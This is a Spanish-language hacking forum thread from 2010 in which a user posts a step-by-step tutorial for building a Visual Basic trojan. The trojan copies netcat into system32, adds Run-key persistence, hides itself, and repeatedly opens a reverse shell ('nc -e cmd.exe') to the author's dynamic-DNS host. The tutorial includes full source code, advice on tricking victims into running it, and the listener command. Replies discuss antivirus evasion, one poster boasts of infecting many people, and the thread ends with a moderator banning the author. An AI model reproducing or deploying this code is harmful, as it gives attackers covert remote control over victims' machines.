Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: MagoMagico en 16 Marzo 2010, 17:32 pm



Título: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: MagoMagico en 16 Marzo 2010, 17:32 pm
Ante que todo , este es mi primir tutorial & aporte , para elhacker.net , y mi primir post en el foro , me presento , soy MagoMagico.

De antemano al tutorial , doy aviso , que és necesario utilizar la ingenieria social.-

Indice :

1)Introducción.-
2)Creando las aplicaciones & Registrando un no-ip.-
3)Ingenieria social.-
4)Dejando puerto a la escucha , para la conexion del netcat.-

                                           Intruducción

Antes que todo , quiero advertir,que deben tener primero que todo un poco de conocimientos de los que és msdos , ya que no sabran que hacer luego de obtener la shell remota , Tambien viene bien, un poco de conocimientos de como usar el netcat , y tambien de visualbasic,eso facilitaria la tarea.
Este manual , no esta basado en linux,si no que esta echo para los que trabajan en windows.
Al final del manual ,dejare referencias,de tutoriales de netcat,visualbasic,No-ip,msdos,que pueden servir.-




Armandonos con las herramientas :

0x01: Necesitamos el nc.exe .

Acá tienen la descarga directa.

Descarga nc (http://joncraton.org/files/nc111nt.zip)

El nc.exe ,lo pondremos en la ruta Windows/system32.-

-~-

Después, para compilar , nuestro proyecto,que va a hacer la asaña , necesitamos el visualbasic 6.0 , mejor si tienen el visual studio,pero tranquilamente pueden usar uno portable,busquen bien , porque muchos de los portables,no andan con eficiencia, y casi siempre fallan , al compilar.-
Aclaración : Nuestra aplicación, va a ser indetectable,por cualquier antivirus.-

Pues esto es todo lo que necesitamos,empezemos.-

                                Creando archivo visualbasic.

abrimos el visualbasic, y creamos un proyecto de tipo standar EXE

(http://r.i.elhacker.net/cache?url=http://img168.imageshack.us/img168/2443/123asdadasd12319da7c6xz.jpg)

Colocamos un timer , en el proyecto.
Buscan la propiedad enabled y la cambian por false.-

Bueno , en el form load del proyecto , ponemos el siguiente codigo.-

(http://r.i.elhacker.net/cache?url=http://img219.imageshack.us/img219/2443/123asdadasd12319da7c6xz.jpg)

Código:
Private Sub Form_Load()
Timer1.Interval = 1000 ' Ajustamos el tiempo del timer en MS.
Form1.Visible = False ' Ocultamos la ventana del formulario
Timer1.Enabled = True ' Activamos el timer.
FileCopy App.Path & "\nc.exe", Environ("systemroot") & "\system32\nc.exe"  'Copiamos el nc , que va a estar en la carpeta del proyecto a system32.
FileCopy App.Path & "\proyectod.exe", Environ("systemroot") & "\system32\proyectod.exe"
' Copiamos el proyecto que va a conectar a nuestro netcat luego del reinicio del 'ordenador.
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v c:\windows\system32\proyectod.exe  /t REG_SZ /f"
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v d:\windows\system32\proyectod.exe  /t REG_SZ /f"
'Aqui hacmos las entradas al registro , para que se autoinicie proyectod.exe,que vamos a crear a continuación.-
Form1.Hide ' Ocultamos form
App.TaskVisible = False ' Hacemos invisible la aplicacion en el administrador de tareas.
End Sub

En el timer ,ponemos lo siguiente.-

Código:
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe NOIP 5555"), vbHide
End Sub


Referencias NO-IP : Aqui va, nuestra no-ip,que remplazara a nuestra ip , con un conjunto de letras que identificaran nuestra ip , para que cuando cambie nuestra ip ,no se nos joda la aplicación,para esto , vamos a no-ip.com , nos registramos y aderimos un host que sustituya tu ip , si no sabeis como crear un no-ip , visita las referencias que dejo al final del tutorial.-

Yo ya tengo mi no-ip , que es framework.sytes.net,que en este caso , el codigo del timer quedaria asi.

Código:
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
' Establecemos conexion con nuestro pc , a travez del no-ip y el puerto 5555
'Con el vbhide,ocultamos la ventana del msdos.-
End Sub

Nuestro primer proyecto terminado quedaria algo parecido a esto.-

Código:
Private Sub Form_Load()
Timer1.Interval = 1200
Form1.Visible = False
Timer1.Enabled = True
FileCopy App.Path & "\nc.exe", Environ("systemroot") & "\system32\nc.exe"
FileCopy App.Path & "\proyectod.exe", Environ("systemroot") & "\system32\proyectod.exe"
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v c:\windows\system32\proyectod.exe  /t REG_SZ /f"
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v d:\windows\system32\proyectod.exe  /t REG_SZ /f"
Form1.Hide
App.TaskVisible = False
End Sub

Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
End Sub

Cambian mi no-ip , por el suyo. okok ! vamos a crear el proyectod.exe

abrimos un nuevo proyecto standar .exe, ponemos un timer en el proyecto y en el codigo ponemos lo siguiente :

Código:
Private Sub Form_Load()
Timer1.Interval = 1200
Form1.Visible = False
Timer1.Enabled = True
Form1.Hide
App.TaskVisible = False
End Sub

Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
End Sub

Compilamos los 2 proyectos, el primero lo guardamos con el nombre que querramos , el segundo , como proyectod.exe

Bien,hacemos una carpeta, y metemos todo ahi adentro , y ponemos el nc.exe adentro de esa carpeta.-

Quedaría algo así. :

(http://r.i.elhacker.net/cache?url=http://img715.imageshack.us/img715/6284/asdkaskdj123asads.jpg)

Ok, eso lo ponemos en un .rar y esta listo para enviar.-

3)Ahora viene lo que es ingenieria social, teneis que hacer que tu victima habra el archivo abrir.exe , que es el que va a copiar el nc.exe en system32 , va a cargar las entradas al registro , tambien establecer conexiones y copiar el proyectod.exe.

Una vez que habra abrir.exe, ya esta infectado podemos obtener shell remota de la siguiente forma..


4)Dejando puerto a la escucha.

Vamos a inicio->ejecutar->cmd

ponemos el siguiente comando ...

nc -l -p 5555 y damos enter.-

* Yo puse en la imagen , 7500 , porque es el puerto que uso.-

(http://r.i.elhacker.net/cache?url=http://img687.imageshack.us/img687/5722/shellremotaaa182319823a.jpg)


Ahora, cuando tienen esta shell,se les pueden venir mil cosas por la cabeza, si saben usar el msdos ,o saben programación en batch, pues si no saben como usar esta shell , lean las referencias , y luego sabran.-

Referencias :

Creando una no-ip :

http://www.gamerzlove.com/f54/guia-como-crear-un-no-ip-129455/

Tutorial de visualbasic :

http://www.elguruprogramador.com.ar/tutoriales/visual-basic

Tutorial netcat para noobs.

http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html

La programación en entorno msdos y batch.

http://www.elhacker.net/ProgramacionBat.htm

Mi despedida :

Bueno,espero que les guste,cualquier duda,critica,advertencia,amenaza en este topico , o bien un MP.

Me despido att : MagoMagico




Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: Shell Root en 16 Marzo 2010, 17:46 pm
mmm Pero en la maquina victima tiene que estar el nc


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: MagoMagico en 16 Marzo 2010, 18:01 pm
El programa a enviar,tiene el nc.exe, en la carpeta, ese nc con el codigo vb se autocopia en system32 , donde luego se ejecuta.

Salu2.


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: Shell Root en 16 Marzo 2010, 18:49 pm
xD y como se supone que se enviar?


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: MagoMagico en 16 Marzo 2010, 19:33 pm
xD y como se supone que se enviar?

Se supone que se usa la ingenieria social ,para enviar los archivos.

Saludos,MAGOMAGICO.


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: Shell Root en 16 Marzo 2010, 19:37 pm
1. A de ser uno muy idiota para recibir 2 archivos y más con nombre nc.exe
2. Nunca he visto algo como esto, se enviand 2 archivo. Debe ser 1 archivo por lo menos.


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: Man-In-the-Middle en 16 Marzo 2010, 20:01 pm
Tutorial, basico entendible  bueno para los que recien emoiezan, pero hay que poner algo claro el NC es detectado por casi todos los AVS, lo cual primero tendrias dejar 100% FUD el nc y de ahi realizar todo el procedur*


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: wACtOr en 16 Marzo 2010, 22:34 pm
umm esa bien, pero tienes que tener en cuenta que casi todos los AVs detectan el netcat, y aunque lo consigas indetectabilizar (no se si existe esta palabra xD) la mayoria de de AVs detectaran que se intenta copiar a si mismo en otra carpeta, con lo que saltara la alarma.

Suerte


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: PHAMTOM en 16 Marzo 2010, 22:49 pm
1. A de ser uno muy idiota para recibir 2 archivos y más con nombre nc.exe
2. Nunca he visto algo como esto, se enviand 2 archivo. Debe ser 1 archivo por lo menos.


1)Los hay,esta llenos de idiotas.. eehh man te paso un cheat , un ok recivi y logre infectar a muchos con este archivo.
2)Que un archivo por lo menos?podes mandar un rar,  y que ejecute uno y listo.-

Tutorial, basico entendible  bueno para los que recien emoiezan, pero hay que poner algo claro el NC es detectado por casi todos los AVS, lo cual primero tendrias dejar 100% FUD el nc y de ahi realizar todo el procedur*

Tengo el nod 32 y no lo detectó.

El tutorial es para gente,que no tiene muchos conocimientos y recien se inician en el tema hacking,se supone que esta en hacking basico .

PHAMTOM


Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: Man-In-the-Middle en 17 Marzo 2010, 02:37 am
Citar
Tengo el nod 32 y no lo detectó.
Yo tengo el nod 32 y lo detecta, segundo esto del netcat esta mas que hablado, tercero deberia ir a programacion Vbs o en Analisis malware.

Cosas Claras, Cosas Simples.



Título: Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
Publicado por: sirdarckcat en 20 Marzo 2010, 20:56 pm
tema cerrado y usuario baneado (https://foro.elhacker.net/Smileys/cowboy/wink.gif)